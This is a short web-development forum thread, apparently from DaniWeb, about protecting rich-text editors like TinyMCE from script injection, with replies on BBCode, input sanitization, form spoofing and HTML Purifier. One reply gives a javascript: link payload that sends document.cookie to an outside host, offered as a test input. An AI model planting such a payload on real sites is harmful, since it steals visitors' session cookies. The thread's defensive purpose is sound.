0

Hello,
I was reading web security stuffs and found that user can inject malicious codes mostly JS in forms. Now, What about CKFinder/TinyMCE et al? They obviously produce html and any stripping will destroy the article formatting. bad enough they have a "code mode" where user can enter html directly.
Suppose my system is compromised (which is security thinking), what guards can I put to ensure minimum damage?
Thanks :)

4
Contributors
4
Replies
5
Views
6 Years
Discussion Span
Last Post by Stefano Mtangoo
0

They *should* not allow inserting javascript, but always, try your best at inserting things like

<a href="javascript:location='www.somesite.com?cookies='+document.cookie">nice stuff!!</a>

if this ends up in your site, and the editor didn't block it, something is wrong.

Edited by twiss: n/a

0

set your editors NOT to produce html, but some other, of the many kinds of enhanced text
like bbcode that is used to add [b]bold[/b] code highlighting and text effects in these forums, daniweb,
thats why alternate forms exist
the script handles the code and produces html, there is no chance of html injection

0

Be aware that your forms can be spoofed. I could set up a form identical to yours on my server and send it to yours if I know the 'action' attribute value. Even if you try to hide it with ajax, I could find it by printing the js file. So, your protection will come from validating and sanitizing your incoming data. I never presume that POST data actually comes from my site. There are a few things you can try in order to detect an off-site post though, but I don't know how secure these are these days. $_SERVER, etc. It may be possible to spoof these too.

0

Thanks budddies, I found HTML purifier filter. Do anyone know how Strong it is? And How to set My editor to produce BBCode? and how do I convert BBCode to HTML so that I can display it in a browser?
Thanks!

This topic has been dead for over six months. Start a new discussion instead.
Have something to contribute to this discussion? Please be thoughtful, detailed and courteous, and be sure to adhere to our posting rules.